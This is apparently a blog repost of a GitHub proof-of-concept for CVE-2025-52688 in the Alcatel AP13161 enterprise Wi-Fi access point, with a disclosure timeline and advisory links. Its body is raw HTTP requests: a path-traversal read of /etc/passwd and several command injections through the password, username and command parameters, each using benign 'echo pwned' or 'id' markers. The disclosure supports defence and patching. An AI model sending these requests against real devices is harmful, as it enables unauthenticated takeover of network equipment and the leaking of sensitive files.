Alcatel AP13161 命令注入与文件读取漏洞

漏洞信息

漏洞名称: Alcatel AP13161 命令注入与文件读取漏洞

漏洞编号:

  • CVE: CVE-2025-52688

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: Alcatel AP13161是一款企业级WIFI接入点设备,广泛应用于企业网络环境中,提供无线网络接入服务。该设备存在两个主要的安全漏洞:一是多个JSON web参数缺乏输入净化,允许注入恶意字符如;,从而导致命令注入攻击;二是fileName参数缺乏适当的净化和访问控制,允许未经授权的用户读取服务器上的任意文件。这些漏洞的技术根源在于对用户输入的不当验证和访问控制的缺失。攻击者可以利用这些漏洞执行远程代码或读取敏感文件,无需任何认证即可实现攻击,对企业的网络安全构成严重威胁。具体来说,命令注入漏洞允许攻击者在设备上执行任意系统命令,可能导致设备完全被控制;文件读取漏洞则可能导致敏感信息泄露,如密码文件等。这些漏洞的利用可以自动化进行,增加了攻击的风险和影响范围。

产品厂商: Alcatel

产品名称: AP13161

来源: https://github.com/joelczk/CVE-2025-52688

类型: CVE-2025:github search

仓库文件

  • README.md

来源概述

CVE-2025-52688

Affected Products

Alcatel AP13161 - Enterprise WIFI access point

Summary

There are 2 main vulnerabilities being addressed here:

  • Lack of input sanization on multiple JSON web parameters that allows malicious characters such as ; to be injected to caused a command injection attack
  • Lack of proper sanitization and access control on the fileName parameters that allows unauthorized arbitary file read on the server

This vulnerability was discovered during SPIRICYBER-24 IoT/OT Hackathon organized by CSA(Cybersecurity Agency of Singapore) & NTU

POC

File Read POC

The fileName parameter allows any unauthenticated user to be able to view any files on the system. By traversing through the directories, we are able to read sensitive files on the server

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /echo.fcgi HTTP/1.1
Host: XXXXX
User-Agent: Mozilla/5.0 (Linux; U; Android 7.0; en-us; MI 5 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.146 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.0.3
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 110
Connection: keep-alive
{
    "id":1,
    "jsonrpc":"2.0",
    "username":"xxx",
    "method":"downloader.cert",
    "params":{
        "fileName":"/../../etc/passwd"
    }
}

RCE POC #1

The password parameter on /apiaccess endpoint is vulnerable to unauthenticated command injection vulnerability that allows any unauthenticated users to execute system commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /apiaccess HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
{
    "id":1,
    "jsonrpc":"2.0",
    "method":"system.getPvc",
    "params":{
        "username": "Administrator",
        "password":";echo pwned1234 > /tmp/test.txt"
    }
}

RCE POC #2

The username parameter on the echo.fcgi endpoint is vulnerable to unauthenticated command injection vulnerablity that allows any unauthenticated users to execute system commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /echo.fcgi HTTP/1.1
Host: 
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: application/json, text/plain, */*
{
    "id":1,
    "jsonrpc":"2.0",
    "username":"Administrator",
    "method":"user.logout",
    "params":{
        "username": ";echo pwned > /tmp/test.txt",
        "Sessionid":""
    }
}

RCE POC #3

The command parameter allows authenticated users to execute system functions and binaries to test the functionality of the lamp post. However, due to insufficient input filtering and blacklist, we are able to bypass the filters to execute an aunthenticated remote code execution that allows any logged in users to execute system commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST /echo.fcgi HTTP/1.1
Host: XXXX
Content-Length: 349
Accept: application/json, text/plain, */*
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{
    "id":1,
    "jsonrpc":"2.0",
    "method":"expressmessage.call",
    "username":"Administrator",
    "session":"XXXXXX",
    "topic":"WMA/DC:XXXXXXX",
    "params":{
        "version":"3.0",
        "messageID":1,
        "macAddress":"DC:XXXXX",
        "option":"update",
        "method":"ap_manage.exce_command",
        "contents":{
            "command":"tech_support_command 9 127.0.0.1\nid"
       }
    }
}

Timeline

2024-08-10: Report submitted to SpiritCyber IoT Hackathon triage team

2024-08-20: Report accepted by triage team

2025-06-25: CSA SingCert assigns CVE-2025-52688

2025-07-14: Public disclosure

Advisory

https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-072

https://www.al-enterprise.com/-/media/567414972b57459697030898f92ac043.pdf

Github Poc
#命令执行 #CVE-2025:github search
Alcatel AP13161 命令注入与文件读取漏洞
http://example.com/2025/07/16/github_3160355198/
作者
lianccc
发布于
2025年7月16日
许可协议